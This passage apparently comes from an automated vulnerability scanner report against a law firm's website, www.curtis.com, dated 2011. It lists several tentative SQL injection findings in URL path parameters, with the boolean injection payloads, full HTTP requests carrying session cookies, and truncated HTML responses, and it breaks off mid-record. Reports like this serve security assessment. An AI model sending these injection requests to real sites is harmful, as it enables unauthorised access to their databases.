Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>

<!--::staticcontent::-->

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.value.length == 0)||(document.forms["attorneysearch"].firstlastname.value == "Enter Attorney Name")){
       alert('Please enter an attorneys first or last name for your search.');
       document.forms["attorneysearch"].firstlastname.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 8pt;
}
body {
   background-color: #FFF;
   margin-left: 0px;
   margin-top: 10px;
   margin-right: 0px;
   margin-bottom: 10px;
}
--
...[SNIP]...
1.26. http://www.curtis.com/scripts/DateRange/ipopeng.htm [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /scripts/DateRange/ipopeng.htm

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 13057657'%20or%201%3d1--%20 and 13057657'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /scripts/DateRange/ipopeng.htm13057657'%20or%201%3d1--%20 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/sitecontent.cfm?pageid=13
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.4.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 1 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:01:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<link rel="stylesheet" href="scripts/general.css" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/menu.css" type="text/css" media="all" />
<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css"/>
<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />
<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>
<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>
<script src="scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.dimensions.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/carousel/carousel_behavior_min.js"></script>
<script language="javascript" type="text/javascript" src="scripts/nyroModal/nyroModal.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/carousel/carousel.css" type="text/css">


<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.value.length == 0)||(document.forms["attorneysearch"].firstlastname.value == "Enter Attorney Name")){
       alert('Please enter an attorneys first or last name for your search.');
       document.forms["attorneysearc
...[SNIP]...

Request 2

GET /scripts/DateRange/ipopeng.htm13057657'%20or%201%3d2--%20 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/sitecontent.cfm?pageid=13
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.4.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 2 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:01:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>

<!--::staticcontent::-->

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.value.length == 0)||(document.forms["attorneysearch"].firstlastname.value == "Enter Attorney Name")){
       alert('Please enter an attorneys first or last name for your search.');
       document.forms["attorneysearch"].firstlastname.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 8pt;
}
body {
   background-color: #FFF;
   margin-left: 0px;
   margin-top: 10px;
   margin-right: 0px;
   margin-bottom: 10px;
}
--
...[SNIP]...
1.27. http://www.curtis.com/sifr3/adobegaramond.swf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /sifr3/adobegaramond.swf

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 15403378'%20or%201%3d1--%20 and 15403378'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /sifr315403378'%20or%201%3d1--%20/adobegaramond.swf HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/sitecontent.cfm?pageid=6
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=6175843; CFTOKEN=32575697; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.2.10.1303145803

Response 1 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:02:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<link rel="stylesheet" href="scripts/general.css" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/menu.css" type="text/css" media="all" />
<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css"/>
<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />
<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>
<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>
<script src="scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.dimensions.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/carousel/carousel_behavior_min.js"></script>
<script language="javascript" type="text/javascript" src="scripts/nyroModal/nyroModal.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/carousel/carousel.css" type="text/css">


<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.value.length == 0)||(document.forms["attorneysearch"].firstlastname.value == "Enter Attorney Name")){
       alert('Please enter an attorneys first or last name for your search.');
       document.forms["attorneysearc
...[SNIP]...

Request 2

GET /sifr315403378'%20or%201%3d2--%20/adobegaramond.swf HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/sitecontent.cfm?pageid=6
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=6175843; CFTOKEN=32575697; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.2.10.1303145803

Response 2 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:02:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>

<!--::staticcontent::-->

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.value.length == 0)||(document.forms["attorneysearch"].firstlastname.value == "Enter Attorney Name")){
       alert('Please enter an attorneys first or last name for your search.');
       document.forms["attorneysearch"].firstlastname.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 8pt;
}
body {
   background-color: #FFF;
   margin-left: 0px;
   margin-top: 10px;
   margin-right: 0px;
   margin-bottom: 10px;
}
--
...[SNIP]...
1.28. http://www.curtis.com/sifr3/adobegaramond.swf [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /sifr3/adobegaramond.swf

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 11428496'%20or%201%3d1--%20 and 11428496'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /sifr3/adobegaramond.swf11428496'%20or%201%3d1--%20 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/sitecontent.cfm?pageid=6
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=6175843; CFTOKEN=32575697; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.2.10.1303145803

Response 1 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:02:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<link rel="stylesheet" href="scripts/general.css" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/menu.css" type="text/css" media="all" />
<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css"/>
<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />
<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>
<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>
<script src="scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.dimensions.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/carousel/carousel_behavior_min.js"></script>
<script language="javascript" type="text/javascript" src="scripts/nyroModal/nyroModal.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/carousel/carousel.css" type="text/css">


<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.value.length == 0)||(document.forms["attorneysearch"].firstlastname.value == "Enter Attorney Name")){
       alert('Please enter an attorneys first or last name for your search.');
       document.forms["attorneysearc
...[SNIP]...

Request 2

GET /sifr3/adobegaramond.swf11428496'%20or%201%3d2--%20 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/sitecontent.cfm?pageid=6
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=6175843; CFTOKEN=32575697; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.2.10.1303145803

Response 2 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:02:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>

<!--::staticcontent::-->

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.value.length == 0)||(document.forms["attorneysearch"].firstlastname.value == "Enter Attorney Name")){
       alert('Please enter an attorneys first or last name for your search.');
       document.forms["attorneysearch"].firstlastname.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 8pt;
}
body {
   background-color: #FFF;
   margin-left: 0px;
   margin-top: 10px;
   margin-right: 0px;
   margin-bottom: 10px;
}
--
...[SNIP]...
1.29. http://www.curtis.com/sifr3/gillsans.swf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /sifr3/gillsans.swf

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 13597788'%20or%201%3d1--%20 and 13597788'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /sifr313597788'%20or%201%3d1--%20/gillsans.swf HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/sitecontent.cfm?pageid=6
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=6175843; CFTOKEN=32575697; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.2.10.1303145803

Response 1 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:02:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<link rel="stylesheet" href="scripts/general.css" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/menu.css" type="text/css" media="all" />
<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css"/>
<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />
<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>
<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>
<script src="scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.dimensions.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/carousel/carousel_behavior_min.js"></script>
<script language="javascript" type="text/javascript" src="scripts/nyroModal/nyroModal.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/carousel/carousel.css" type="text/css">


<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.value.length == 0)||(document.forms["attorneysearch"].firstlastname.value == "Enter Attorney Name")){
       alert('Please enter an attorneys first or last name for your search.');
       document.forms["attorneysearc
...[SNIP]...

Request 2

GET /sifr313597788'%20or%201%3d2--%20/gillsans.swf HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/sitecontent.cfm?pageid=6
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=6175843; CFTOKEN=32575697; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.2.10.1303145803

Response 2 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:02:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>

<!--::staticcontent::-->

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.value.length == 0)||(document.forms["attorneysearch"].firstlastname.value == "Enter Attorney Name")){
       alert('Please enter an attorneys first or last name for your search.');
       document.forms["attorneysearch"].firstlastname.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 8pt;
}
body {
   background-color: #FFF;
   margin-left: 0px;
   margin-top: 10px;
   margin-right: 0px;
   margin-bottom: 10px;
}
--
...[SNIP]...
1.30. http://www.curtis.com/sifr3/gillsans.swf [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /sifr3/gillsans.swf

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 14043355'%20or%201%3d1--%20 and 14043355'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

